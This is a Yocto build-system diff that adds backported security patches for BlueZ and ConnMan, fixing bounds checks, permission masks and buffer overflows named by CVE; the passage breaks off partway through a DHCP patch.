--- a/meta/recipes-connectivity/bluez5/bluez5.inc
+++ b/meta/recipes-connectivity/bluez5/bluez5.inc
@@ -7,6 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
file://COPYING.LIB;md5=fb504b67c50331fc78734fed90fb0e09 \
file://src/main.c;beginline=1;endline=24;md5=9bc54b93cd7e17bf03f52513f39f926e"
DEPENDS = "dbus glib-2.0"
+RDEPENDS:${PN} += "dbus"
PROVIDES += "bluez-hcidump"
RPROVIDES_${PN} += "bluez-hcidump"
@@ -52,6 +53,13 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \
${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \
file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
file://0001-test-gatt-Fix-hung-issue.patch \
+ file://CVE-2021-0129.patch \
+ file://CVE-2021-3588.patch \
+ file://CVE-2021-3658.patch \
+ file://CVE-2022-0204.patch \
+ file://CVE-2022-39176.patch \
+ file://CVE-2022-3637.patch \
+ file://CVE-2023-45866.patch \
"
S = "${WORKDIR}/bluez-${PV}"
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch
new file mode 100644
index 0000000000..b39730dc10
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch
@@ -0,0 +1,109 @@
+From 00da0fb4972cf59e1c075f313da81ea549cb8738 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 2 Mar 2021 11:38:33 -0800
+Subject: shared/gatt-server: Fix not properly checking for secure flags
+
+When passing the mask to check_permissions all valid permissions for
+the operation must be set including BT_ATT_PERM_SECURE flags.
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/patch/?id=00da0fb4972cf59e1c075f313da81ea549cb8738]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+CVE: CVE-2021-0129
+---
+ src/shared/att-types.h | 8 ++++++++
+ src/shared/gatt-server.c | 25 +++++++------------------
+ 2 files changed, 15 insertions(+), 18 deletions(-)
+
+diff --git a/src/shared/att-types.h b/src/shared/att-types.h
+index 7108b4e94..3adc05d9e 100644
+--- a/src/shared/att-types.h
++++ b/src/shared/att-types.h
+@@ -129,6 +129,14 @@ struct bt_att_pdu_error_rsp {
+ #define BT_ATT_PERM_WRITE_SECURE 0x0200
+ #define BT_ATT_PERM_SECURE (BT_ATT_PERM_READ_SECURE | \
+ BT_ATT_PERM_WRITE_SECURE)
++#define BT_ATT_PERM_READ_MASK (BT_ATT_PERM_READ | \
++ BT_ATT_PERM_READ_AUTHEN | \
++ BT_ATT_PERM_READ_ENCRYPT | \
++ BT_ATT_PERM_READ_SECURE)
++#define BT_ATT_PERM_WRITE_MASK (BT_ATT_PERM_WRITE | \
++ BT_ATT_PERM_WRITE_AUTHEN | \
++ BT_ATT_PERM_WRITE_ENCRYPT | \
++ BT_ATT_PERM_WRITE_SECURE)
+
+ /* GATT Characteristic Properties Bitfield values */
+ #define BT_GATT_CHRC_PROP_BROADCAST 0x01
+diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
+index b5f7de7dc..970c35f94 100644
+--- a/src/shared/gatt-server.c
++++ b/src/shared/gatt-server.c
+@@ -444,9 +444,7 @@ static void process_read_by_type(struct async_read_op *op)
+ return;
+ }
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -811,9 +809,7 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
+ handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+- BT_ATT_PERM_WRITE_AUTHEN |
+- BT_ATT_PERM_WRITE_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+
+@@ -913,9 +909,7 @@ static void handle_read_req(struct bt_att_chan *chan,
+ opcode == BT_ATT_OP_READ_BLOB_REQ ? "Blob " : "",
+ handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1051,9 +1045,8 @@ static void read_multiple_complete_cb(struct gatt_db_attribute *attr, int err,
+ goto error;
+ }
+
+- ecode = check_permissions(data->server, next_attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(data->server, next_attr,
++ BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1129,9 +1122,7 @@ static void read_multiple_cb(struct bt_att_chan *chan, uint8_t opcode,
+ goto error;
+ }
+
+- ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1308,9 +1299,7 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
+ util_debug(server->debug_callback, server->debug_data,
+ "Prep Write Req - handle: 0x%04x", handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+- BT_ATT_PERM_WRITE_AUTHEN |
+- BT_ATT_PERM_WRITE_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+
+--
+cgit 1.2.3-1.el7
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch
new file mode 100644
index 0000000000..f52ff47a06
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch
@@ -0,0 +1,34 @@
+From 3a40bef49305f8327635b81ac8be52a3ca063d5a Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Mon, 4 Jan 2021 10:38:31 -0800
+Subject: [PATCH] gatt: Fix potential buffer out-of-bound
+
+When client features is read check if the offset is within the cli_feat
+bounds.
+
+Fixes: https://github.com/bluez/bluez/issues/70
+
++Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=3a40bef49305f8327635b81ac8be52a3ca063d5a]
++Signed-off-by: Steve Sakoman <steve@sakoman.com>
++CVE: CVE-2021-3588
+
+---
+ src/gatt-database.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/src/gatt-database.c b/src/gatt-database.c
+index 90cc4bade..f2d7b5821 100644
+--- a/src/gatt-database.c
++++ b/src/gatt-database.c
+@@ -1075,6 +1075,11 @@ static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
+ goto done;
+ }
+
++ if (offset >= sizeof(state->cli_feat)) {
++ ecode = BT_ATT_ERROR_INVALID_OFFSET;
++ goto done;
++ }
++
+ len = sizeof(state->cli_feat) - offset;
+ value = len ? &state->cli_feat[offset] : NULL;
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch
new file mode 100644
index 0000000000..1738ca13da
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch
@@ -0,0 +1,95 @@
+From b497b5942a8beb8f89ca1c359c54ad67ec843055 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Thu, 24 Jun 2021 16:32:04 -0700
+Subject: [PATCH] adapter: Fix storing discoverable setting
+
+discoverable setting shall only be store when changed via Discoverable
+property and not when discovery client set it as that be considered
+temporary just for the lifetime of the discovery.
+
+Upstream-Status: Backport [https://github.com/bluez/bluez/commit/b497b5942a8beb8f89ca1c359c54ad67ec843055]
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+---
+ src/adapter.c | 35 ++++++++++++++++++++++-------------
+ 1 file changed, 22 insertions(+), 13 deletions(-)
+
+diff --git a/src/adapter.c b/src/adapter.c
+index 12e4ff5c0..663b778e4 100644
+--- a/src/adapter.c
++++ b/src/adapter.c
+@@ -560,7 +560,11 @@ static void settings_changed(struct btd_adapter *adapter, uint32_t settings)
+ if (changed_mask & MGMT_SETTING_DISCOVERABLE) {
+ g_dbus_emit_property_changed(dbus_conn, adapter->path,
+ ADAPTER_INTERFACE, "Discoverable");
+- store_adapter_info(adapter);
++ /* Only persist discoverable setting if it was not set
++ * temporarily by discovery.
++ */
++ if (!adapter->discovery_discoverable)
++ store_adapter_info(adapter);
+ btd_adv_manager_refresh(adapter->adv_manager);
+ }
+
+@@ -2162,8 +2166,6 @@ static bool filters_equal(struct mgmt_cp_start_service_discovery *a,
+ static int update_discovery_filter(struct btd_adapter *adapter)
+ {
+ struct mgmt_cp_start_service_discovery *sd_cp;
+- GSList *l;
+-
+
+ DBG("");
+
+@@ -2173,17 +2175,24 @@ static int update_discovery_filter(struct btd_adapter *adapter)
+ return -ENOMEM;
+ }
+
+- for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
+- struct discovery_client *client = l->data;
++ /* Only attempt to overwrite current discoverable setting when not
++ * discoverable.
++ */
++ if (!(adapter->current_settings & MGMT_OP_SET_DISCOVERABLE)) {
++ GSList *l;
+
+- if (!client->discovery_filter)
+- continue;
++ for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
++ struct discovery_client *client = l->data;
+
+- if (client->discovery_filter->discoverable)
+- break;
+- }
++ if (!client->discovery_filter)
++ continue;
+
+- set_discovery_discoverable(adapter, l ? true : false);
++ if (client->discovery_filter->discoverable) {
++ set_discovery_discoverable(adapter, true);
++ break;
++ }
++ }
++ }
+
+ /*
+ * If filters are equal, then don't update scan, except for when
+@@ -2216,8 +2225,7 @@ static int discovery_stop(struct discovery_client *client)
+ return 0;
+ }
+
+- if (adapter->discovery_discoverable)
+- set_discovery_discoverable(adapter, false);
++ set_discovery_discoverable(adapter, false);
+
+ /*
+ * In the idle phase of a discovery, there is no need to stop it
+@@ -6913,6 +6921,7 @@ static void adapter_stop(struct btd_adapter *adapter)
+ g_free(adapter->current_discovery_filter);
+ adapter->current_discovery_filter = NULL;
+
++ set_discovery_discoverable(adapter, false);
+ adapter->discovering = false;
+
+ while (adapter->connections) {
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch
new file mode 100644
index 0000000000..646b5ddfc8
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch
@@ -0,0 +1,66 @@
+From 0d328fdf6564b67fc2ec3533e3da201ebabcc9e3 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 8 Jun 2021 16:46:49 -0700
+Subject: [PATCH] shared/gatt-server: Fix heap overflow when appending prepare
+ writes
+
+The code shall check if the prepare writes would append more the
+allowed maximum attribute length.
+
+Fixes https://github.com/bluez/bluez/security/advisories/GHSA-479m-xcq5-9g2q
+
+Upstream-Status: Backport [https://github.com/bluez/bluez/commit/591c546c536b42bef696d027f64aa22434f8c3f0]
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+CVE: CVE-2022-0204
+
+---
+ src/shared/gatt-server.c | 22 ++++++++++++++++++++++
+ 1 file changed, 22 insertions(+)
+
+diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
+index 0c25a97..20e14bc 100644
+--- a/src/shared/gatt-server.c
++++ b/src/shared/gatt-server.c
+@@ -816,6 +816,20 @@ static uint8_t authorize_req(struct bt_gatt_server *server,
+ server->authorize_data);
+ }
+
++static uint8_t check_length(uint16_t length, uint16_t offset)
++{
++ if (length > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
++
++ if (offset > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_OFFSET;
++
++ if (length + offset > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
++
++ return 0;
++}
++
+ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ uint16_t length, void *user_data)
+ {
+@@ -846,6 +860,10 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
+ handle);
+
++ ecode = check_length(length, 0);
++ if (ecode)
++ goto error;
++
+ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+@@ -1353,6 +1371,10 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
+ util_debug(server->debug_callback, server->debug_data,
+ "Prep Write Req - handle: 0x%04x", handle);
+
++ ecode = check_length(length, offset);
++ if (ecode)
++ goto error;
++
+ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch
new file mode 100644
index 0000000000..4ca60f99d5
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch
@@ -0,0 +1,39 @@
+From b808b2852a0b48c6f9dbb038f932613cea3126c2 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 27 Oct 2022 09:51:27 +0530
+Subject: [PATCH] CVE-2022-3637
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/monitor/jlink.c?id=1d6cfb8e625a944010956714c1802bc1e1fc6c4f]
+CVE: CVE-2022-3637
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+monitor: Fix crash when using RTT backend
+
+This fix regression introduced by "monitor: Fix memory leaks".
+J-Link shared library is in use if jlink_init() returns 0 and thus
+handle shall not be closed.
+---
+ monitor/jlink.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/monitor/jlink.c b/monitor/jlink.c
+index afa9d93..5bd4aed 100644
+--- a/monitor/jlink.c
++++ b/monitor/jlink.c
+@@ -120,9 +120,12 @@ int jlink_init(void)
+ !jlink.tif_select || !jlink.setspeed ||
+ !jlink.connect || !jlink.getsn ||
+ !jlink.emu_getproductname ||
+- !jlink.rtterminal_control || !jlink.rtterminal_read)
++ !jlink.rtterminal_control || !jlink.rtterminal_read) {
++ dlclose(so);
+ return -EIO;
++ }
+
++ /* don't dlclose(so) here cause symbols from it are in use now */
+ return 0;
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch
new file mode 100644
index 0000000000..7bd1f5f80f
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch
@@ -0,0 +1,126 @@
+From 752c7f707c3cc1eb12eadc13bc336a5c484d4bdf Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 28 Sep 2022 10:45:53 +0530
+Subject: [PATCH] CVE-2022-39176
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+source/bluez/5.53-0ubuntu3.6]
+CVE: CVE-2022-39176
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ profiles/audio/avdtp.c | 56 +++++++++++++++++++++++++++---------------
+ profiles/audio/avrcp.c | 8 ++++++
+ 2 files changed, 44 insertions(+), 20 deletions(-)
+
+diff --git a/profiles/audio/avdtp.c b/profiles/audio/avdtp.c
+index 782268c..0adf413 100644
+--- a/profiles/audio/avdtp.c
++++ b/profiles/audio/avdtp.c
+@@ -1261,43 +1261,53 @@ struct avdtp_remote_sep *avdtp_find_remote_sep(struct avdtp *session,
+ return NULL;
+ }
+
+-static GSList *caps_to_list(uint8_t *data, int size,
++static GSList *caps_to_list(uint8_t *data, size_t size,
+ struct avdtp_service_capability **codec,
+ gboolean *delay_reporting)
+ {
++ struct avdtp_service_capability *cap;
+ GSList *caps;
+- int processed;
+
+ if (delay_reporting)
+ *delay_reporting = FALSE;
+
+- for (processed = 0, caps = NULL; processed + 2 <= size;) {
+- struct avdtp_service_capability *cap;
+- uint8_t length, category;
++ if (size < sizeof(*cap))
++ return NULL;
++
++ for (caps = NULL; size >= sizeof(*cap);) {
++ struct avdtp_service_capability *cpy;
+
+- category = data[0];
+- length = data[1];
++ cap = (struct avdtp_service_capability *)data;
+
+- if (processed + 2 + length > size) {
++ if (sizeof(*cap) + cap->length > size) {
+ error("Invalid capability data in getcap resp");
+ break;
+ }
+
+- cap = g_malloc(sizeof(struct avdtp_service_capability) +
+- length);
+- memcpy(cap, data, 2 + length);
++ if (cap->category == AVDTP_MEDIA_CODEC &&
++ cap->length < sizeof(**codec)) {
++ error("Invalid codec data in getcap resp");
++ break;
++ }
++
++ cpy = btd_malloc(sizeof(*cpy) + cap->length);
++ memcpy(cpy, cap, sizeof(*cap) + cap->length);
+
+- processed += 2 + length;
+- data += 2 + length;
++ size -= sizeof(*cap) + cap->length;
++ data += sizeof(*cap) + cap->length;
+
+- caps = g_slist_append(caps, cap);
++ caps = g_slist_append(caps, cpy);
+
+- if (category == AVDTP_MEDIA_CODEC &&
+- length >=
+- sizeof(struct avdtp_media_codec_capability))
+- *codec = cap;
+- else if (category == AVDTP_DELAY_REPORTING && delay_reporting)
+- *delay_reporting = TRUE;
++ switch (cap->category) {
++ case AVDTP_MEDIA_CODEC:
++ if (codec)
++ *codec = cpy;
++ break;
++ case AVDTP_DELAY_REPORTING:
++ if (delay_reporting)
++ *delay_reporting = TRUE;
++ break;
++ }
+ }
+
+ return caps;
+@@ -1494,6 +1504,12 @@ static gboolean avdtp_setconf_cmd(struct avdtp *session, uint8_t transaction,
+ &stream->codec,
+ &stream->delay_reporting);
+
++ if (!stream->caps || !stream->codec) {
++ err = AVDTP_UNSUPPORTED_CONFIGURATION;
++ category = 0x00;
++ goto failed_stream;
++ }
++
+ /* Verify that the Media Transport capability's length = 0. Reject otherwise */
+ for (l = stream->caps; l != NULL; l = g_slist_next(l)) {
+ struct avdtp_service_capability *cap = l->data;
+diff --git a/profiles/audio/avrcp.c b/profiles/audio/avrcp.c
+index d9471c0..0233d53 100644
+--- a/profiles/audio/avrcp.c
++++ b/profiles/audio/avrcp.c
+@@ -1916,6 +1916,14 @@ static size_t handle_vendordep_pdu(struct avctp *conn, uint8_t transaction,
+ goto err_metadata;
+ }
+
++ operands += sizeof(*pdu);
++ operand_count -= sizeof(*pdu);
++
++ if (pdu->params_len != operand_count) {
++ DBG("AVRCP PDU parameters length don't match");
++ pdu->params_len = operand_count;
++ }
++
+ for (handler = session->control_handlers; handler->pdu_id; handler++) {
+ if (handler->pdu_id == pdu->pdu_id)
+ break;
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch
new file mode 100644
index 0000000000..43670ab2b3
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch
@@ -0,0 +1,54 @@
+From 25a471a83e02e1effb15d5a488b3f0085eaeb675 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 10 Oct 2023 13:03:12 -0700
+Subject: input.conf: Change default of ClassicBondedOnly
+
+This changes the default of ClassicBondedOnly since defaulting to false
+is not inline with HID specification which mandates the of Security Mode
+4:
+
+BLUETOOTH SPECIFICATION Page 84 of 123
+Human Interface Device (HID) Profile:
+
+5.4.3.4.2 Security Modes
+Bluetooth HID Hosts shall use Security Mode 4 when interoperating with
+Bluetooth HID devices that are compliant to the Bluetooth Core
+Specification v2.1+EDR[6].
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=25a471a83e02e1effb15d5a488b3f0085eaeb675]
+CVE: CVE-2023-45866
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ profiles/input/device.c | 2 +-
+ profiles/input/input.conf | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/profiles/input/device.c b/profiles/input/device.c
+index 375314e..0236488 100644
+--- a/profiles/input/device.c
++++ b/profiles/input/device.c
+@@ -93,7 +93,7 @@ struct input_device {
+
+ static int idle_timeout = 0;
+ static bool uhid_enabled = false;
+-static bool classic_bonded_only = false;
++static bool classic_bonded_only = true;
+
+ void input_set_idle_timeout(int timeout)
+ {
+diff --git a/profiles/input/input.conf b/profiles/input/input.conf
+index 4c70bc5..d8645f3 100644
+--- a/profiles/input/input.conf
++++ b/profiles/input/input.conf
+@@ -17,7 +17,7 @@
+ # platforms may want to make sure that input connections only come from bonded
+ # device connections. Several older mice have been known for not supporting
+ # pairing/encryption.
+-# Defaults to false to maximize device compatibility.
++# Defaults to true for security.
+ #ClassicBondedOnly=true
+
+ # LE upgrade security
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5_5.55.bb b/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
index 8190924562..be74a35e0a 100644
--- a/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
+++ b/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
@@ -3,6 +3,16 @@ require bluez5.inc
SRC_URI[md5sum] = "94972b8bc7ade60c72b0ffa6ccff2c0a"
SRC_URI[sha256sum] = "8863717113c4897e2ad3271fc808ea245319e6fd95eed2e934fae8e0894e9b88"
+# These issues have kernel fixes rather than bluez fixes so exclude here
+CVE_CHECK_WHITELIST += "CVE-2020-12352 CVE-2020-24490"
+
+# Commit 7a80d2096f1b7125085e21448112aa02f49f5e9a, e2b0f0d8d63e1223bb714a9efb37e2257818268b
+# and 0388794dc5fdb73a4ea88bcf148de0a12b4364d4 to fix CVE-2022-39177
+# already backport in CVE-2022-39176.patch
+# https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1977968
+
+CVE_CHECK_WHITELIST += "CVE-2022-39177"
+
# noinst programs in Makefile.tools that are conditional on READLINE
# support
NOINST_TOOLS_READLINE ?= " \
diff --git a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
index 778bf50191..24593d6258 100644
--- a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
+++ b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
@@ -10,7 +10,7 @@ DEPENDS = "gtk+3 dbus-glib dbus-glib-native intltool-native gettext-native"
# 0.7 tag
SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143"
-SRC_URI = "git://github.com/connectivity/connman-gnome.git \
+SRC_URI = "git://github.com/connectivity/connman-gnome.git;branch=master;protocol=https \
file://0001-Removed-icon-from-connman-gnome-about-applet.patch \
file://null_check_for_ipv4_config.patch \
file://images/* \
diff --git a/meta/recipes-connectivity/connman/connman.inc b/meta/recipes-connectivity/connman/connman.inc
index 55e5bf97c7..c495ae29ad 100644
--- a/meta/recipes-connectivity/connman/connman.inc
+++ b/meta/recipes-connectivity/connman/connman.inc
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
inherit autotools pkgconfig systemd update-rc.d update-alternatives
+CVE_PRODUCT = "connman connection_manager"
+
DEPENDS = "dbus glib-2.0 ppp"
INC_PR = "r20"
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch
new file mode 100644
index 0000000000..2648a832ca
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch
@@ -0,0 +1,62 @@
+From e4079a20f617a4b076af503f6e4e8b0304c9f2cb Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:41:53 +0100
+Subject: [PATCH] dnsproxy: Add length checks to prevent buffer overflow
+
+Fixes: CVE-2021-26675
+
+Upstream-Status: Backport
+CVE: CVE-2021-26675
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e4079a20f617a4b076af503f6e4e8b0304c9f2cb
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ src/dnsproxy.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index a7bf87a1..4f5c897f 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1767,6 +1767,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ char **uncompressed_ptr)
+ {
+ char *uptr = *uncompressed_ptr; /* position in result buffer */
++ char * const uncomp_end = uncompressed + uncomp_len - 1;
+
+ debug("count %d ptr %p end %p uptr %p", field_count, ptr, end, uptr);
+
+@@ -1787,12 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * tmp buffer.
+ */
+
+- ulen = strlen(name);
+- strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
+-
+ debug("pos %d ulen %d left %d name %s", pos, ulen,
+ (int)(uncomp_len - (uptr - uncompressed)), uptr);
+
++ ulen = strlen(name);
++ if ((uptr + ulen + 1) > uncomp_end) {
++ goto out;
++ }
++ strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
++
+ uptr += ulen;
+ *uptr++ = '\0';
+
+@@ -1802,6 +1806,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * We copy also the fixed portion of the result (type, class,
+ * ttl, address length and the address)
+ */
++ if ((uptr + NS_RRFIXEDSZ) > uncomp_end) {
++ debug("uncompressed data too large for buffer");
++ goto out;
++ }
+ memcpy(uptr, ptr, NS_RRFIXEDSZ);
+
+ dns_type = uptr[0] << 8 | uptr[1];
+--
+2.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch
new file mode 100644
index 0000000000..4104e4bfc6
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch
@@ -0,0 +1,231 @@
+From 58d397ba74873384aee449690a9070bacd5676fa Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:39:14 +0100
+Subject: [PATCH] gdhcp: Avoid reading invalid data in dhcp_get_option
+
+Upstream-Status: Backport
+CVE: CVE-2021-26676
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=58d397ba74873384aee449690a9070bacd5676fa
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ gdhcp/client.c | 20 +++++++++++---------
+ gdhcp/common.c | 24 +++++++++++++++++++-----
+ gdhcp/common.h | 2 +-
+ gdhcp/server.c | 12 +++++++-----
+ 4 files changed, 38 insertions(+), 20 deletions(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 09dfe5ec..6a5613e7 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -1629,12 +1629,12 @@ static void start_request(GDHCPClient *dhcp_client)
+ NULL);
+ }
+
+-static uint32_t get_lease(struct dhcp_packet *packet)
++static uint32_t get_lease(struct dhcp_packet *packet, uint16_t packet_len)
+ {
+ uint8_t *option;
+ uint32_t lease_seconds;
+
+- option = dhcp_get_option(packet, DHCP_LEASE_TIME);
++ option = dhcp_get_option(packet, packet_len, DHCP_LEASE_TIME);
+ if (!option)
+ return 3600;
+
+@@ -2226,7 +2226,8 @@ static void get_dhcpv6_request(GDHCPClient *dhcp_client,
+ }
+ }
+
+-static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
++static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet,
++ uint16_t packet_len)
+ {
+ GDHCPOptionType type;
+ GList *list, *value_list;
+@@ -2237,7 +2238,7 @@ static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
+ for (list = dhcp_client->request_list; list; list = list->next) {
+ code = (uint8_t) GPOINTER_TO_INT(list->data);
+
+- option = dhcp_get_option(packet, code);
++ option = dhcp_get_option(packet, packet_len, code);
+ if (!option) {
+ g_hash_table_remove(dhcp_client->code_value_hash,
+ GINT_TO_POINTER((int) code));
+@@ -2297,6 +2298,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ re = dhcp_recv_l2_packet(&packet,
+ dhcp_client->listener_sockfd,
+ &dst_addr);
++ pkt_len = (uint16_t)(unsigned int)re;
+ xid = packet.xid;
+ } else if (dhcp_client->listen_mode == L3) {
+ if (dhcp_client->type == G_DHCP_IPV6) {
